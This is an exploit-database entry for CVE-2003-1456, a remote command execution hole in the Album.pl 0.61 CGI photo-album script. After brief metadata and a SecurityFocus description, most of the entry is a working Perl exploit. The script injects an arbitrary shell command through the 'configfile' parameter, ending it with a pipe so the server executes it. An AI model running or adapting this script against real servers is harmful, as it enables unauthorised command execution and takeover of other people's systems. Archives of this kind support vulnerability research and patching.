Mike Bobbitt Album.PL 0.61 - Remote Command Execution

Author: aresu@bosen.net
type: webapps
platform: cgi
port: 
date_added: 2003-04-26 
date_updated: 2012-11-07 
verified: 1 
codes: CVE-2003-1456;OSVDB-41109 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/7444/info

A remote command execution vulnerability has been reported for Album.pl. The vulnerability reportedly exists when alternate configuration files are used.

The precise technical details of this vulnerability are currently unknown. This BID will be updated as further information is available.

#!/usr/bin/perl -w

use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
$| = 1;

if (!$ARGV[0] && !$ARGV[1])
{
	print "\n Usage: perl $0 <album_uri> \"<command>\" \n\n";
	exit;
}

$command="$ARGV[0]?configfile=$ARGV[1]|";

my $conn=LWP::UserAgent->new();
my $data=HTTP::Request->new(GET => $command);
my $result=$conn->request($data);
if ($result->is_error())
{
	printf " %s\n", $result->status_line;
}
else
{
	print "Success: $result\n";
}